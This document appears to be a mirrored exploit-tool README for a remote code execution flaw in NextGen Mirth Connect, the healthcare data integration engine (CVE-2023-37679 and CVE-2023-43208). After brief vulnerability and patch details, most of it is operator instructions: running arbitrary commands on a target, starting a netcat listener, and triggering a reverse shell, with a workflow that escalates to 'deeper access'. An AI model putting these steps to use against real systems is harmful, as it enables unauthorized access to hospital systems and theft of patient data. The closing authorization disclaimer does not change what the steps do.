Share
## https://sploitus.com/exploit?id=3A8619C8-D9A5-5519-9533-09F5C091EC33
# RCE Vulnerability in Mirth Connect (CVE-2023-37679 & CVE-2023-43208)

***A critical Remote Code Execution (RCE) vulnerability was identified in NextGen Mirth Connect, a healthcare integration engine widely used by hospitals and clinics to exchange sensitive patient data.***

***CVE-2023-43208 allows attackers to bypass authentication and gain unauthorized access to the system. Once exploited, this flaw can lead to full system compromise, including arbitrary command execution.***

***This issue emerged after an earlier vulnerability (CVE-2023-37679) was patched. However, the original fix was incomplete, resulting in a bypass that led to the discovery of CVE-2023-43208.***

### Affected Versions:
### All versions up to 4.4.0

### Fixed In:
### Version 4.4.1

### Because Mirth Connect operates in healthcare environments handling sensitive patient information, immediate patching is strongly recommended.

โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

# ๐ŸŽฏ USAGE MODES

## 1) Direct Command Execution (No Listener Required)

***Execute system commands directly on the target.***

## Examples:

## Network test
```
python exploit.py -u https://target.com -c "ping -c 3 YOUR_IP"
```

## System information
```
python exploit.py -u https://target.com -c "whoami"
python exploit.py -u https://target.com -c "id"
python exploit.py -u https://target.com -c "uname -a"
```

## File enumeration
```
python exploit.py -u https://target.com -c "ls -la"
python exploit.py -u https://target.com -c "dir"   # Windows systems
```

โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

## 2) Reverse Shell Mode (Listener Required)

Step 1: Start a listener
nc -lvnp 4444

Step 2: Trigger reverse shell
python exploit.py -u https://target.com -lh 0.0.0.0 -lp 4444

โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

## โœ… Key Features

-c "command"     โ†’ Execute arbitrary commands instantly  
-lh / -lp        โ†’ Configure reverse shell  
Auto mode detect โ†’ Prevents argument conflicts  
Cross-platform   โ†’ Works on Linux & Windows  

โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

## ๐Ÿงช Recommended Testing Workflow

***1. Test RCE safely using a basic command like ping.***
***2. Confirm command execution works.***
***3. Proceed to reverse shell if deeper access is required.***

โš  Use strictly in authorized environments. Unauthorized exploitation is illegal and unethical.